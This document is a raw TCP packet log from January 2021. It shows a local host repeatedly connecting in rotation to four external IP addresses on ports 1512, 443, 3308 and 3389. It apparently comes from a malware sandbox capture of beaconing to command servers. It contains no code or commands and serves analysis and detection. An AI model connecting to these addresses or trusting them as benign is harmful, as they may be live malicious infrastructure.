Jan 12, 2021 07:40:58.053035975 CET	1512	49285	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:58.053112030 CET	49285	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:58.053349018 CET	49285	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:58.056355953 CET	49285	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:58.109302998 CET	1512	49285	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:58.160270929 CET	49286	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:58.212152004 CET	443	49286	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:58.212981939 CET	49286	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:58.213994026 CET	49286	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:58.265697002 CET	443	49286	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:58.289483070 CET	443	49286	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:58.289808989 CET	49286	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:58.299886942 CET	49286	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:58.355314970 CET	443	49286	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:58.355460882 CET	49286	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:58.365103960 CET	49286	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:58.365283966 CET	49286	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:58.416999102 CET	443	49286	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:58.417174101 CET	49286	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:58.469084024 CET	443	49286	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:58.587810993 CET	443	49286	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:58.587869883 CET	443	49286	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:58.588087082 CET	49286	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:58.592601061 CET	49286	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:58.644551039 CET	443	49286	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:58.710279942 CET	49287	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:58.753490925 CET	3308	49287	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:58.755515099 CET	49287	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:58.757025003 CET	49287	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:58.800132036 CET	3308	49287	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:58.810733080 CET	3308	49287	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:58.810761929 CET	3308	49287	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:58.814194918 CET	49287	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:58.824271917 CET	49287	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:58.870752096 CET	3308	49287	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:58.871155977 CET	49287	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:58.878664970 CET	49287	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:58.878720045 CET	49287	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:58.921819925 CET	3308	49287	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:58.922717094 CET	49287	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:58.962224960 CET	3308	49287	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:58.965833902 CET	3308	49287	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:59.078876019 CET	3308	49287	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:59.078897953 CET	3308	49287	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:59.079073906 CET	49287	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:59.085594893 CET	49287	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:59.128813982 CET	3308	49287	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:59.194451094 CET	49288	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:59.252975941 CET	3389	49288	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:59.253122091 CET	49288	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:59.254326105 CET	49288	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:59.307490110 CET	3389	49288	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:59.330127954 CET	3389	49288	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:59.330152988 CET	3389	49288	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:59.330292940 CET	49288	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:59.342248917 CET	49288	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:59.402796984 CET	3389	49288	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:59.403152943 CET	49288	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:59.409147024 CET	49288	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:59.409245014 CET	49288	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:59.463089943 CET	3389	49288	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:59.463385105 CET	49288	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:59.502218962 CET	3389	49288	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:59.516805887 CET	3389	49288	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:59.516832113 CET	3389	49288	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:59.607831955 CET	3389	49288	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:59.607858896 CET	3389	49288	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:59.608006001 CET	49288	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:59.610368967 CET	49288	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:59.665276051 CET	3389	49288	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:59.721671104 CET	49289	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:59.774513006 CET	1512	49289	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:59.774707079 CET	49289	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:59.776822090 CET	49289	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:59.829718113 CET	1512	49289	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:59.837573051 CET	1512	49289	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:59.837599993 CET	1512	49289	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:59.837716103 CET	49289	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:59.851943970 CET	49289	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:59.906224012 CET	1512	49289	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:59.906423092 CET	49289	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:59.916263103 CET	49289	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:59.916552067 CET	49289	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:59.969208956 CET	1512	49289	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:59.969463110 CET	49289	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:00.008953094 CET	1512	49289	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:00.022181034 CET	1512	49289	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:00.022214890 CET	1512	49289	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:00.120340109 CET	1512	49289	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:00.120363951 CET	1512	49289	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:00.120448112 CET	49289	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:00.123986959 CET	49289	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:00.176826000 CET	1512	49289	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:00.240119934 CET	49290	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:00.292674065 CET	443	49290	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:00.292841911 CET	49290	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:00.294621944 CET	49290	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:00.346801043 CET	443	49290	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:00.361535072 CET	443	49290	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:00.361653090 CET	49290	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:00.376146078 CET	49290	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:00.430790901 CET	443	49290	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:00.431061983 CET	49290	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:00.441963911 CET	49290	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:00.442198038 CET	49290	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:00.494354010 CET	443	49290	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:00.494777918 CET	49290	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:00.547094107 CET	443	49290	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:00.665818930 CET	443	49290	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:00.665889978 CET	443	49290	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:00.666230917 CET	49290	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:00.672106981 CET	49290	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:00.724514008 CET	443	49290	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:00.782578945 CET	49291	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:00.825983047 CET	3308	49291	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:00.826952934 CET	49291	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:00.828433990 CET	49291	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:00.871532917 CET	3308	49291	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:00.883724928 CET	3308	49291	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:00.883771896 CET	3308	49291	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:00.883881092 CET	49291	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:00.896689892 CET	49291	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:00.941621065 CET	3308	49291	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:00.941979885 CET	49291	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:00.952572107 CET	49291	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:00.952965021 CET	49291	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:00.996076107 CET	3308	49291	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:00.996355057 CET	49291	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:01.039654016 CET	3308	49291	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:01.153493881 CET	3308	49291	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:01.153528929 CET	3308	49291	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:01.153795004 CET	49291	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:01.156585932 CET	49291	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:01.199733973 CET	3308	49291	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:01.266649961 CET	49292	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:01.320285082 CET	3389	49292	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:01.320432901 CET	49292	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:01.321685076 CET	49292	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:01.375303984 CET	3389	49292	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:01.393800020 CET	3389	49292	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:01.393846989 CET	3389	49292	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:01.393906116 CET	49292	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:01.393934011 CET	49292	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:01.404335976 CET	49292	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:01.463264942 CET	3389	49292	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:01.463486910 CET	49292	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:01.469422102 CET	49292	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:01.469602108 CET	49292	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:01.523442984 CET	3389	49292	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:01.523674965 CET	49292	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:01.562478065 CET	3389	49292	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:01.577621937 CET	3389	49292	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:01.577682972 CET	3389	49292	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:01.667565107 CET	3389	49292	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:01.667632103 CET	3389	49292	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:01.667972088 CET	49292	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:01.668025970 CET	49292	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:01.671365023 CET	49292	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:01.725162983 CET	3389	49292	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:01.780703068 CET	49293	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:01.833719969 CET	1512	49293	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:01.833863974 CET	49293	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:01.834919930 CET	49293	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:01.887845039 CET	1512	49293	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:01.895019054 CET	1512	49293	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:01.895072937 CET	1512	49293	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:01.895275116 CET	49293	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:01.895332098 CET	49293	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:01.910958052 CET	49293	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:01.965120077 CET	1512	49293	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:01.965548992 CET	49293	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:01.978349924 CET	49293	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:01.979197979 CET	49293	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:02.032213926 CET	1512	49293	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:02.032346964 CET	49293	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:02.085567951 CET	1512	49293	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:02.186639071 CET	1512	49293	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:02.186671019 CET	1512	49293	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:02.186888933 CET	49293	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:02.322770119 CET	49293	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:02.375730038 CET	1512	49293	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:02.435029030 CET	49294	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:02.487370014 CET	443	49294	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:02.487462044 CET	49294	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:02.489109039 CET	49294	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:02.541466951 CET	443	49294	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:02.555783987 CET	443	49294	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:02.555979967 CET	49294	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:02.569299936 CET	49294	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:02.623888016 CET	443	49294	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:02.624136925 CET	49294	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:02.636303902 CET	49294	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:02.636477947 CET	49294	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:02.688972950 CET	443	49294	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:02.689285040 CET	49294	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:02.741794109 CET	443	49294	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:02.861099958 CET	443	49294	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:02.861146927 CET	443	49294	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:02.861294985 CET	49294	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:03.015348911 CET	49294	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:03.067590952 CET	443	49294	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:03.122482061 CET	49295	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:03.165731907 CET	3308	49295	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:03.165838957 CET	49295	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:03.166485071 CET	49295	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:03.209691048 CET	3308	49295	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:03.225374937 CET	3308	49295	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:03.225452900 CET	3308	49295	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:03.225536108 CET	49295	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:03.225586891 CET	49295	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:03.240833998 CET	49295	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:03.286530018 CET	3308	49295	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:03.286885977 CET	49295	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:03.297209978 CET	49295	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:03.297568083 CET	49295	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:03.340759039 CET	3308	49295	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:03.340930939 CET	49295	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:03.379976988 CET	3308	49295	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:03.384409904 CET	3308	49295	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:03.384439945 CET	3308	49295	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:03.497037888 CET	3308	49295	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:03.497078896 CET	3308	49295	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:03.497209072 CET	49295	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:03.861182928 CET	49295	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:03.904417992 CET	3308	49295	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:03.975833893 CET	49296	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:04.029661894 CET	3389	49296	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:04.029759884 CET	49296	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:04.030730009 CET	49296	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:04.084724903 CET	3389	49296	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:04.101774931 CET	3389	49296	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:04.101804972 CET	3389	49296	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:04.101938009 CET	49296	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:04.126446962 CET	49296	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:04.186650038 CET	3389	49296	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:04.186849117 CET	49296	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:04.195804119 CET	49296	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:04.195923090 CET	49296	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:04.250719070 CET	3389	49296	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:04.250927925 CET	49296	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:04.290263891 CET	3389	49296	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:04.304424047 CET	3389	49296	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:04.304475069 CET	3389	49296	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:04.396080017 CET	3389	49296	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:04.396142006 CET	3389	49296	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:04.396219969 CET	49296	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:04.396255016 CET	49296	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:04.402865887 CET	49296	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:04.457206011 CET	3389	49296	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:04.515294075 CET	49297	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:04.568927050 CET	1512	49297	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:04.569065094 CET	49297	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:04.570666075 CET	49297	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:04.624346972 CET	1512	49297	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:04.631314993 CET	1512	49297	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:04.631359100 CET	1512	49297	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:04.631406069 CET	49297	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:04.631434917 CET	49297	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:04.644042969 CET	49297	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:04.698179007 CET	1512	49297	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:04.698311090 CET	49297	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:04.702447891 CET	49297	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:04.702583075 CET	49297	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:04.756012917 CET	1512	49297	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:04.756262064 CET	49297	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:04.793370962 CET	1512	49297	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:04.809550047 CET	1512	49297	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:04.809664011 CET	1512	49297	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:04.913305044 CET	1512	49297	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:04.913331032 CET	1512	49297	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:04.913526058 CET	49297	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:04.916392088 CET	49297	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:04.969422102 CET	1512	49297	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:05.037501097 CET	49298	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:05.089412928 CET	443	49298	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:05.089598894 CET	49298	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:05.091069937 CET	49298	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:05.142702103 CET	443	49298	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:05.159917116 CET	443	49298	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:05.160027027 CET	49298	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:05.174087048 CET	49298	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:05.228197098 CET	443	49298	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:05.228375912 CET	49298	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:05.235675097 CET	49298	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:05.235999107 CET	49298	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:05.287576914 CET	443	49298	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:05.287704945 CET	49298	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:05.327012062 CET	443	49298	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:05.339483976 CET	443	49298	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:05.457871914 CET	443	49298	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:05.457897902 CET	443	49298	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:05.457941055 CET	49298	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:05.457977057 CET	49298	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:05.461419106 CET	49298	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:05.513089895 CET	443	49298	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:05.575506926 CET	49299	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:05.618957043 CET	3308	49299	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:05.619180918 CET	49299	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:05.620765924 CET	49299	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:05.663851023 CET	3308	49299	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:05.674748898 CET	3308	49299	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:05.674783945 CET	3308	49299	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:05.674835920 CET	49299	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:05.674868107 CET	49299	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:05.688697100 CET	49299	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:05.733665943 CET	3308	49299	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:05.733805895 CET	49299	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:05.739089966 CET	49299	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:05.739289999 CET	49299	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:05.782479048 CET	3308	49299	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:05.782741070 CET	49299	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:05.823175907 CET	3308	49299	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:05.825855970 CET	3308	49299	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:05.825886965 CET	3308	49299	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:05.938807964 CET	3308	49299	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:05.938879013 CET	3308	49299	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:05.939213037 CET	49299	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:05.944874048 CET	49299	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:05.987998962 CET	3308	49299	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:06.059334993 CET	49300	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:06.114314079 CET	3389	49300	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:06.114479065 CET	49300	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:06.116111040 CET	49300	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:06.170051098 CET	3389	49300	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:06.191112995 CET	3389	49300	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:06.191138029 CET	3389	49300	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:06.191227913 CET	49300	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:06.203015089 CET	49300	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:06.267108917 CET	3389	49300	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:06.267438889 CET	49300	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:06.278127909 CET	49300	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:06.278235912 CET	49300	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:06.335932970 CET	3389	49300	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:06.336149931 CET	49300	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:06.376379967 CET	3389	49300	5.100.228.233	192.168.2.22
